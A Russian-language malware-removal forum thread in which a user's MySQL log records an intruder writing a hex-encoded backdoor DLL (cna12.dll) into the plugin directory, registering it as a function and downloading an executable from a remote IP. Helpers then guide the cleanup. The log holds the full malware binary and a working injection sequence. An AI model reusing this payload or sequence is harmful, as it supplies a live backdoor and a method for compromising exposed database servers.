Размер архива с .exe файлами - 153 мб. Они загрузятся?
Опа Подождите пока, не уверен.
WBR,
Vadim
Вот сейчас в очередной раз аваст вновь заблокировал mysqld.exe и тут до меня дошло (как я раньше не додумался ) посмотреть логи самого mysql. Вот что обнаружил в логах при последнем проявления активности зловереда (жаль что сервер перезапускал и старые логи стерты)
Как я понимаю он создает таблицу в базе данных, в неё запихивает код, который потом инпортирует в файл cna12.dll, а сам код наверное содержится в строке 0x4D5A900003000....Код:W:\modules\database\MySQL-5.6.14\bin\mysqld.exe, Version: 5.6.14-log (MySQL Community Server (GPL)). started with: TCP Port: 3306, Named Pipe: (null) Time Id Command Argument 131017 22:38:33 2 Connect [email protected] on mysql 131017 22:38:34 2 Query set autocommit=0 131017 22:38:35 2 Quit 131017 22:38:36 3 Connect [email protected] on mysql 3 Query set autocommit=0 3 Query SELECT VERSION() 131017 22:38:37 3 Query set @a = concat('',0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000EF55A8C1AB34C692AB34C692AB34C692C42BCC92AF34C692C42BC292A934C692AB34C692A834C692AB34C792B834C692C92BD592AC34C6929D12CD92A934C6925414C292AA34C69252696368AB34C692000000000000000000000000000000000000000000000000504500004C0103000E6DFF4F0000000000000000E0000E210B01060000100000001000000050000020660000006000000070000000000010001000000002000004000000000000000400000000000000008000000010000000000000020000000000100000100000000010000010000000000000100000006C71000070000000007000006C010000000000000000000000000000000000000000000000000000DC7100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000500000001000000000000000040000000000000000000000000000800000E0555058310000000000100000006000000008000000040000000000000000000000000000400000E05550583200000000001000000070000000020000000C0000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303400555058210D0902081292E561117752FFF14200001406000000500000260100C02F775FFE8B4C2408B801003BC8750A0C04890D21D8C2FCF676EC0C0090008B4412C7400813100432C0C3EE6FDFBE81EC34020C5355568D1810575033F6682E6E77FBDD906813808974241CC71528044DFF15315DB7BDFD0085C075208D531C8D542B515C183428D8EDD8EF52505633845123048B1B14520ADC5DFBEE08B9660033C08D7C244B20F3AB2ED375DDFF3F2850516A01565A383774073C5BB77B4D5C44B80750007FE80C03FB7BEBBA524D2835182F506A03663C568912768FFD6F2C1B4C8BAC244C0260942440398B1DFFFF7FEF74108B4D0827208B790483C9FFF2AEF7D12BF98BC18BF78BFA63DFFFFFC1E902F3A58BC883E103F3A4FFD38D8C24AC6D840694DBBB3F7303C01483BC24BC0D0275558B1BB0EEDEFD3783E804743E48740E48F6487543BF5D14EB41FF5E83E91CB4120B17150CEB2B83EFDDCFD8F802250704EB1B0620FCEB1413D6DC217F0AF0EB09E89DBA9F58B0367B6A00A107A3C1ED6B77B1A8CE8B115218F1586CEF164CF70F85D500E93513062620A8FFD6CAC9EDDD8B3D0E1C68102715FFD7886CD662C10F4AEE1406EFFFB16F840470EC3C8BF083C40885F674165614C2DBD8916C38560634190C8DBC599F139E2CAA83C177E6308BB4E11BB608802704D44889460C5154FBD8EF83C352514D40502A2C8B7E0C40750BDB162714438BAB54335F7FFCD6B84B49899F325E5D5B81C482C38B45DE2C65BB08268B386965703E4343C0691752186710422E994084080B3F256C90000F8B400C5974EB4ED8B30846405921FF25134C05B8A11B1948543108F50E39052FECBE6F59DC7E2EFF0D078B051024FE018B09CB21FD4871E0753F6880383059BEF7B7BBA314E875049EEB66832000A10DBC041FBBE1FB04001CE4E204A6FF555959EB3D6AAF8B756339269B305E21E3D8FF5FA471FC3BF072128B0E85C97407FFD11E83EE672DFD1D6CEABB83251100595E2F5885FFDF30F2C1EC538B5D08568B750C578B7D10E76DB4FFF77509833D5F00EB2683FE01740504E62287E97EF364EC09575653FFD0080C6FDDFDFBDC5E82B04E0FA3FBFFFF3389450CDF60ADAE4C17372B23F64603BBDD0ED8752634032125837D7F74115BFBD6450E083C8B025F5E5B5D9C88223B824D280000DF2E7FA877726F6E672E6F6B0328257329DBCBF6FF20706F72746E756D626572200F646F73760A7304D8FBB66925201E002728FFFFADB9002B03633A5C57696E646F77735C76332E6C6F6BBFE4BB6717612B62004374656D70040384BD6F7F3230395C6D61142E657865371F9574FFFE6973657475701A202D6F223D77DAB7EDDB221A70616263057963556E6B6E1E6CF7DEDE07546F6F2F6C64218F50585007EE6F83FC32303033302368652D6E65770BF7BF05B2387737410064006D0069006E03AFB9AE7D7300740072C9056F070D006EEC7FB2611F6C0076003100320033177013A4E1CC6D2365252750394EFDFF0B4159595354454D5C43757272656E74436FED60DBB60372AE53735C0A5C5425FE19B6B76D90616C201472609D5374617400B4BF1967A15244502D5463A4C8561484230CB2398A0AB01010806DF9FF0144656C65746546696C6541470A566DBBDD91BC45780E57690765630853FB9F66BB1D657034BD0052656743726561376BDF8E7D4B6579410E5175377956616C063969B6F717206C6F731F36CA24E0CDFDFF5F61646A7573745F666469760D5D697474DB6E6F0DD60A7370720C7466086D41F7EEED5A367066633D077075747306D36C9B796F70656E73654ED548B5B16FDB4EAD5524724164640B4C386B0276BF3D47726F7570114D6557732D5BFB9F66E25455524C446F776E578454FDFF63B36FEF00172F171D070B260827200839251610FFFFFFBF0A0B212007080E0E070705060F06071D24073F2207471406060E08060B0DEDFFAD6D180500060A150C0622125C1C005045416F8351FF4C0104000E6DFF4F43E00D210B019C7D7684062A0030130D14000F20969D278F10001004000717A40BD650272A02029AEDD9B207067022076E5CF2818CEA4F78DC4000008406922E40575C2E5BF67417B87874B8B0100342CFB6F121602E72642661CCDE2062876C0903A2402E26940CD2DC27F001303036D91CDBC04F652010BC27657353724042043E210000B8870AE5480412000000FF000000000000000000000000807C2408010F85B901000060BE006000108DBE00B0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9070000008A07472CE83C0177F7803F0175F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE004000008B0709C0743C8B5F048D84300060000001F35083C708FF9678600000958A074708C074DC89F95748F2AE55FF967C60000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE806000008DBE00F0FFFFBB0010000050546A045357FFD58D870702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E924ACFFFF0000000000000000000000000000000000000000000000000000000000000000000000B070000078700000000000000000000000000000BD70000090700000000000000000000000000000CA70000098700000000000000000000000000000D5700000A0700000000000000000000000000000E2700000A87000000000000000000000000000000000000000000000EC700000FA7000000A7100001A7100002871000000000000367100000000000044710000000000004A7100000000000056710000000000004B45524E454C33322E444C4C0041445641504933322E646C6C004D53564352542E646C6C004E455441504933322E646C6C0075726C6D6F6E2E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C46726565000000526567436C6F73654B65790000006672656500004E657455736572416464000055524C446F776E6C6F6164546F46696C65410000000000000E6DFF4F00000000B271000001000000030000000300000094710000A0710000AC710000301000003013000020100000BC710000C2710000CF7100000000010002006D7973716C2E646C6C007870646C33007870646C335F6465696E6974007870646C335F696E6974000000006000000C0000002D360000000000000000000000000000000000000000000000000000) 3 Query use mysql 3 Query drop table IF EXISTS yongger2 131017 22:38:38 3 Query SHOW WARNINGS 3 Query create table yongger2(data LONGBLOB) 131017 22:38:39 3 Query insert into yongger2 values("") 3 Query update yongger2 set data = @a 3 Query set @dir2 = concat('select data from yongger2 into DUMPFILE "',@@plugin_dir,'\\cna12.dll"') 131017 22:38:40 3 Query set @dir2 = replace(@dir2,'\\','\\\\') 3 Query set @dir2 = replace(@dir2,"/","\\\\") 131017 22:38:41 3 Query prepare sql3 from @dir2 3 Prepare select data from yongger2 into DUMPFILE "W:\\modules\\database\\MySQL-5.6.14\\lib\\plugin\\\\cna12.dll" 3 Query execute sql3 3 Query select data from yongger2 into DUMPFILE '..\\bin\\cna12.dll' 131017 22:38:42 3 Query drop table IF EXISTS yongger2 3 Query drop FUNCTION xpdl3 131017 22:38:43 3 Query CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll' 131017 22:38:44 3 Query select xpdl3('http://192.210.54.61:280/360sb.exe','c:\\isetup.exe')
Потом создает функцию, которая используя cna12.dll удаленно загружает файлы на компьютер.
Я так понимаю cna12.dll следует засунуть в zip-архив, установить пароль virus и загрузить по красной ссылке?
- - - Добавлено - - -
Не загрузилось походу. Загрузка шла-шла, потом просто выбило форму загрузки без каких либо сообщений об ошибках или успешной загрузке.
Подключался он пользователем root (который был без пароля ) c хоста 192.210.54.61
Изменил пароли всем пользователям mysql. Теперь он вряд ли сможет обратится к mysqld.exe
Сейчас сделаю лог комбофикс.
- - - Добавлено - - -
Загрузил cna12.dll
Результат загрузки
Файл сохранён как 131017_201645_virus_526045ad8c552.zip
Размер файла 2637
MD5 93536da204240579dfa0e0be4ac26e04
Последний раз редактировалось Fruty; 18.10.2013 в 00:25.
Спасибо, кака известная.
WBR,
Vadim
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Прикрепляю лог Combofix
Загрузите в карантин ещё файлИ посмотрите, что это такое:Код:c:\windows\is-33GHD.exeСкорее всего, можно смело удалить.Код:c:\windows\qpthqliksq
Удалите ComboFix.
Выполните скрипт в AVZ при наличии доступа в интернет:После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к броузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.Код:var LogPath : string; ScriptPath : string; begin LogPath := GetAVZDirectory + 'log\avz_log.txt'; if FileExists(LogPath) Then DeleteFile(LogPath); ScriptPath := GetAVZDirectory +'ScanVuln.txt'; if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!'); exit; end; end; if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false) end.
WBR,
Vadim
Возле файла is-33GHD.exe были так же файлы is-33GHD.lst и is-33GHD.msg. Их так же добавил в архив. Проверил на virustotal - по всем трем ни одного срабатывания, все ок.
Результат загрузки
Файл сохранён как 131018_072000_is-33GDH_5260e120721f4.zip
Размер файла 538480
MD5 be4701ddc21d42e82eb4dd2bade0a6aa
что это понять не могу, в текстовом редакторе при открыии - как при открытии dll - одни иероглифы. Только в самом низу можно сквозь строки увидеть "Internal name КАКОЕ_ТО_ИМЯ.exe. Microsoft Corporation". Можно удалять?
c:\windows\qpthqliksq
При открытии контекстного меню в проводнике осталось "Rising Antivirus". Через CCleaner посмотрел, элемент ссылается на файл C:\Windows\System32\ravext.dll, в описании которого "Rising Shell Ext Module". Я могу его удалить?
Еще, извините за некомпетентность в данном вопросе, хотел бы понять (если вопрос глупый - можете просто проигнорировать).
Получается, как такового зловреда не было что-ли? Он просто подключался удаленно ко мне и тогда уже выполнялись какие-то операции. Тогда не могу понять, откуда он знал, как ко мне подключится, ведь ip у меня динамический, и как я понимаю для этого явно нужно что-то, чтобы информировало его, как ко мне подключится.
Откуда-то он ведь узнавал, как ко мне подключится, чтобы загрузить на компьютер cna12.dll
- - - Добавлено - - -
Скрипт AVZ выполнил, найдено была уязвимость в java, обновил. Повторил скрипт - уязвимости не найдены.
Удаляйте is-33GHD.* и qpthqliksq.
Что касается Rising Antivirus - попробуем его корректно вычистить.
Сделайте полный образ автозапуска uVS, только программу скачайте отсюда.
Ваш адрес просто попался при сканировании портов, подложить личинку успели, а дальше бэкдор уже сам наружу вылезал.
WBR,
Vadim
Статистика проведенного лечения:
- Получено карантинов: 4
- Обработано файлов: 22
- В ходе лечения обнаружены вредоносные программы:
- \\cna12.dll - Backdoor.Win32.Small.lhd ( DrWEB: BackDoor.Siggen.53556, BitDefender: Backdoor.Generic.757546 )
- c:\\windows\\system32\\winhelp32.exe - Backdoor.Win32.Yoddos.ple ( BitDefender: Gen:Variant.Graftor.30810 )
- c:\\windows\\temp\\isetup.exe - HEUR:Trojan.Win32.Generic ( BitDefender: Dropped:Generic.Malware.SFdld.00DD502D )
Уважаемый(ая) Fruty, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.